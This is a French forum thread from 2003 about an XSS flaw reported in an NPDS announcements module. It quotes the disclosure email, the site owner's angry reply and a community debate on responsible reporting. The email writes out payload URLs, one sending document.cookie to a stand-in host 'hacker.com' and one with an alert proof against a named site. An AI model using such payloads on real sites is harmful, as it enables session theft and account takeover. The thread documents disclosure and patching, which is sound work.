NPDS : Gestion de contenu et de communauté

message reçu via le formulaire du site:

**** Message *****
>From : nosp1@hotmail.com
Code : 75000
Sujet : problème de sécurité
Msg : Bonjour,
Il semblerait qu'il existe un problème de sécurité sur votre site en effet la variable : \"categorie\" dans module.php ne semble pas être défini par défaut et de surcroit pas modifié en passant dans les formulaire avec htmlspecialchars par exemple de plus cette variable étant active sur la page grace à un echo, je suppose, elle permet de faire executer du javascrit à celle-ci. Tout ceci ajouté à une identification permettrait à une personne mal intentionné de récupérer un cookie d'un admin du site, grace à un mail malformé ou suivi d'un lien du genre http://www.lesite.com/modules.php?ModPath=annonces&ModStart=list_ann&id_cat=2&categorie=<script>windowd.location.replace('http://www.hacker.com'+!document.cookie!);</script>&num_ann=5
En espératn à vous avoir aidé quelques peu.
Cordialement

NoSP

Le lien ci-dessous ne fais rien d'autre que d'afficher votre cookie sur la page si vous êtes identifié, il est destiné à vous montrer le problème :

http://www.aidadomicil.com/modules.php?ModPath=annonces&ModStart=list_ann&id_cat=2&categorie=<script>alert(!document.cookie!)</script>&num_ann=5
**** Fin du message ****

y commencent à faire ch...r tous ces redresseurs de sites... on ne leur demande rien de quoi se mèlent-ils... j'ai installé ipban de la v5.0 et bloqué le dns du gus

Copie de la réponse faite au gugusse:

Si nous avons besoin d'un audit de sécurité sur notre site internet, nous en ferons volontairement la démarche auprès d'un service spécialisé, en supposant que cela en vaille la peine. Qui y a-t-il à prendre ou à détruire sur Aid@domicil ? en admettant que celà soit possible, pensez-vous que l'on puisse mettre un baton de dynamite sur le serveur qui nous héberge?
N'avez-vous pas d'autres sites à taquiner ? Un gros site professionnel par exemple, ce serait probablement plus intéressant, non ? Pourquoi emmerder des sites comme le nôtre ?
Pour la peine de nous avoir pollué notre samedi matin, nous considérons votre action comme une tentative d'intrusion et de destruction de nos données placée chez notre hébergeur. Nous conservons les logs de votre passage et de vos actions et en informerons votre fournisseur d'accès. Nous avons l'intention de déposer plainte dès que vos coordonnées personnelles nous serons connues.
Cette plainte n'aboutira probablement pas, mais elle vous obligera à donner des explications auprès des autorités de police ou de gendarmerie, pendant ce temps-là vous vous ne nuirez à personne.
A ne plus vous revoir sur notre site...

C'est pas très sympa tout ça... le type en question n'avait visiblement pas de mauvaises intentions et voulait juste t'aider à corriger la faille avant qu'un vrai pirate méchant ne s'en prenne réellement au site. Même si tu ne comptes pas t'occuper du bug, tu aurais au moins pu le remercier de t'avoir prévenu...

j'ai pour habitude d'essayer de n'emmerder personne et j'aimerais bien que les gens fassent pareil pour moi...

Je suis d'accord. Mais je pense que le gus en question voulait bien faire et qu'il n'avait pas l'intention de t'emmerder mais de t'aider.

je vote comme Xargos..

heh j'ai pas le droit d'être de mauvaise foi ???
je pense avoir joué mon rôle, j'ai transmis l'info à Dev via ce forum et à la communauté, à mon hébergeur à toutes fins utiles et espère avoir perturbé le gugusse pour qu'il aille faire ses éssais de hack ailleurs que chez moi.
Avec ses co...ries, j'ai fermé l'inscription aux membres et bloqué son DNS, comme ça je me bloque l'accès de tous ceux qui viennent du même fournisseur d'accès que lui et il faudrait que je sois content, et ben non je ne le suis pas et je le lui fait remarquer, c'est tout!

aida : refile moi le dernier niveau du module annonce que je vérifie le niveau de sécurité. Je modifie cela et te le renvoi immédiatement, comme cela le trou de ce module sera fermé.

On fera une MAJ de modules.npds.org avec cela

Je ne pense pas que le gus te voulais du mal mais il vos mieux sécurisé ce module effectivement.

A suivre

ok je te le maile

Pour le module en question j'ai passé la main a glolo et lolo le temps pour moi de refaire surface.
Ils sont en train de fignoler la nouvelle version à sortir et si faille il y a le mieux serait de les en informer dans le forum du module (si cela n'est pas déjà fait )

c'est pas le même que le tien, Pstl, t'inquiète pas

ok oui je me rappelle :-)
A voir qd meme si ce pb peut pas concerner d'autres modules d'annonces un peu similaires

sûrement et pas que les annonces!

J'arrive comme un cheveux sur la soupe mais personnelement je penses que ce gus ne te voulait pas de mal puisqu'il te met au courant du probleme. Je rajouterais de surcroit qu'il est heureux qu'il existe des personnes de ce genre pour mettre en avant des failles pouvant etres reprises par des personnes moin bien intentionnées .
Sans cette intervention ce probleme serait passé inapercu pendant combien de temps ?
Finalement il fait avancer le shmilblick a sa facon :=!


[ Message édité par : rolmops : 25-06-2003 02:15 ]

erf trop cliqué !

[ Message édité par : rolmops : 25-06-2003 02:14 ]

ba ca lagguait :(

[ Message édité par : rolmops : 25-06-2003 02:14 ]

yup suis d accord avec toi mais qd c est comme ca en déplaise à dev ... c est ici que ca devrait se passer ... pcq au moins si le mec qui hack un site au hasard, il est pas sûr qu un patch sera appliqué à la future version du portail ... secondo je répète => bordel on hack pas en ligne sauf qd on veut se la peter et emmerder son monde ... on parle de sécu => donc on installe son propre server et on test en local (si pas y reste multimania ...mais ca c ets pas des servers ... ce sont des tondeuses à gazon)

En plus le gars si il voulait aider ? aidadomicile ben il a du mal le prendre !! Et rien ne l'empechait de se connecter ailleurs sans etre banni et te peter le site si c'etait possible !! Faut pas etre mechant avec les ceux qui ne le sont pas .. ou alors faut pas s'etonner si il le devienne ..
Mais tu as le droit d'etre de mauvaise foi si tu le reconnais :-P

Moi , je dis ca je dis rien ......a+

Je suis le gus en question,

Je suis aide-soignant et je cherchais une info sur le site et je suis tombé dessus, par hasard. Je ne considère pas que ce soit du hack, mais une bête erreur de programmation. Et si j'avais mis `ls` se serait-il exécuté ?? exploiter une faille ou en trouver une sur un site n'est pas à mon sens du hack. Mais tout juste contribuer à un peu plus de sécurité sur le net, ma contribution aussi modeste soit-elle...
J'ai prévenu le webmestre pensant bien faire, comme lorsque je tombe sur des répertoires qui devraient être cachés des regards indiscrets ou tout autre faille exploitable sur un site. Mais effectivement je ne pourrai pas empêcher que certains préfèrent ne rien voir, ne rien dire, ne rien entendre (bizarre par rapport au site dont-il s'occupe :-? ) pire quand ceux-ci font preuves d'autant de haine

Effectivement si je veux faire du hack (quoique je n'aime pas utiliser ce terme) j'installe chez moi et je teste en local. As-tu vu un article dans le dernier thj (the hackademy journal) ou bugtraq de correction d'un bug (mineur de surcroit) de ce portail (qui a l'air très bien par ailleurs), non ? donc peut-être qu'en effet c'était une aide à domicile purement gratuite, et oui ? :-D

NoSP